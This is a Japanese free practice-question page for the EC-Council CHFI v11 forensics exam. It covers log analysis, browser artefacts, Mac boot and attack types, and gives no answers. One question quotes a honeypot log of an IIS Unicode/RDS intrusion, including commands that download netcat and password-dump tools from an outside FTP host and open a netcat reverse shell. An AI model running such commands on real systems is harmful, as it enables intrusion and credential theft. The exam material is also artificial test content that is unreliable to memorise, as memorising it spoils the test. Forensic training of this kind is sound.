312-49v11日本語 無料問題集「EC-COUNCIL Computer Hacking Forensic Investigator (CHFI-v11) (312-49v11日本語版)」

調査員は、Windows 10 オペレーティング システムで実行されているシステムに保存されている rp.log ファイルで何を探しているのでしょうか?

あるグローバル企業で大規模なセキュリティ インシデントが発生した後、サイバー セキュリティ部門は、巧妙に仕組まれたフィッシング攻撃と内部攻撃が原因であると特定しました。このサイバー犯罪の影響は甚大で、通常の業務運営に支障をきたし、機密情報が盗まれました。
企業は、このようなインシデントの再発を最小限に抑え、IT インフラストラクチャを保護するための最も効果的な対策を評価する必要があります。何を優先すべきでしょうか?

次のツールのうち、調査員が Web サーバー ログを分析するのに役立ちますか?

権限のないユーザーによる「同乗」を防ぐための適切なセキュリティ方法は何ですか?

「法執行機関またはその代理人が行ういかなる行動も、後に法廷で頼りにされる可能性のあるコンピューターまたはストレージ メディアに保存されたデータを変更してはならない」 - この原則を主張しているのは次のどれですか。

調査員がモバイル デバイスを分析した結果、特定の詳細を発見しました。製造元の情報を明らかにできるものは何ですか?

フォレンジック担当幹部の Chong-lee 氏は、マルウェアが被害者のシステム上のファイルやフォルダのコピーを継続的に作成し、使用可能なディスク領域を消費していると疑っています。どのような種類のテストで彼の主張を裏付けることができますか?

法医学研究所のスタッフが調査を行う際に最初に行う手順は何ですか?

調査員が Cisco ファイアウォールのログをチェックしたところ、次のようなログが見つかりました。
2019年8月21日 09:16:44: %ASA-1-106021: 10.0.0.44からICMPリバースパスチェックを拒否
インターフェース外部の10.0.0.33
%ASA-1-106021 は何を意味しますか?

次のネットワーク攻撃のうち、メールボックスをオーバーフローさせたり、電子メール アドレスがホストされているサーバーを過負荷にしたりして、サービス拒否攻撃を引き起こす目的で、大量の電子メールを特定のアドレスに送信することを指すものはどれですか。

コンピュータハッキングフォレンジック調査員(CHFI)が、侵入されたMacintoshコンピュータを調査しています。システムには、事前にリンクされたカーネルが欠落していることが判明しました。
/System/Library/Caches/com.apple.kernelcaches。このようなシナリオで、Macintosh のブート プロセスがオペレーティング システムをロードするために実行する次の手順は何ですか。

デジタルフォレンジック調査員は、侵害の疑いがあった後にブラウザ履歴分析を実行します。調査員は、Mozilla Firefox、Coogle Chrome、Microsoft Edge の 3 つの Web ブラウザを扱います。
容疑者は Windows を使用していました。捜査官は 3 つのブラウザすべてのキャッシュ、Cookie、履歴を見つける必要があります。正しい場所はどこですか?

法医学的調査中に、大量のファイルが収集されました。調査員は、それらのファイルの所有権と責任を評価する必要があります。そのため、調査員は、「作成者名」、「組織名」、 「ネットワーク名」、または所有者の識別を目的とした追加のサポート データなどの属性を識別し始めます。これらの属性を表す用語はどれですか。

最近のサイバー犯罪の捜査で、フォレンジック分析官は、容疑者が捜査プロセスを複雑にするために反フォレンジック技術を使用していたことを発見しました。犯罪者は、データの消去、メタデータの操作、暗号化を行っていたため、捜査は大幅に複雑になりました。次のシナリオのうち、容疑者が捜査を逃れるためにデータとメタデータを上書きしたことを示すものはどれですか。

法医学調査官アレックスは、期限付きの調査で容疑者の大容量ドライブからデータを収集する必要があります。裁判所は、元のドライブを保持することを許可します。これらの要素を考慮すると、法医学的に確実なデータ取得を確実にするためにアレックスが主に考慮すべきことは何でしょうか。

次の抜粋は、lab.wiretrip.net でホストされていたハニーポット ログから取られたものです。Snort は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイル パーミッション正規化の脆弱性 (UNICODE 攻撃) により、通常はスクリプトを実行する権限のない任意のフォルダーでスクリプトを実行できるようになります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini を表示することに成功しました。
次に、msadcs.dll を介して RDS の操作に切り替えます。RDS の脆弱性により、悪意のあるユーザーは IIS サーバー上でシェル コマンド (CMD.EXE など) を実行する SQL ステートメントを作成できます。ディレクトリが存在することを確認するために簡単なクエリを実行し、msadcs.dll へのクエリで正常に機能していることを確認します。攻撃者は RDS クエリを実行し、その結果、以下に示すようにコマンドが実行されます。
「cmd1.exe /c open 213.116.251.162 >ftpcom」
「cmd1.exe /c echo johna2k >>ftpcom」
「cmd1.exe /c echo haxedj00 >>ftpcom」
「cmd1.exe /c echo get nc.exe >>ftpcom」
「cmd1.exe /c echo get pdump.exe >>ftpcom」
「cmd1.exe /c echo get samdump.dll >>ftpcom」
「cmd1.exe /c echo quit >>ftpcom」
「cmd1.exe /c ftp -s:ftpcom」
「cmd1.exe /c nc -l -p 6969 -e cmd1.exe」
与えられたエクスプロイトから何を推測できますか?

解説: (JPNTest メンバーにのみ表示されます)
どのような種類の攻撃が、偽の送信元アドレスを持つ偽装 UDP パケット (ping パケットではなく) を大規模ネットワークの IP ブロードキャスト アドレスに送信するのでしょうか。

次の法律のうち、各連邦機関が、その業務と資産をサポートする情報システムに情報セキュリティを提供するための組織全体のプログラムを開発、文書化、実装する必要性を強調しているのはどれですか。

弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

オンラインサポート時間:( UTC+9 ) 9:00-24:00
月曜日から土曜日まで

サポート:現在連絡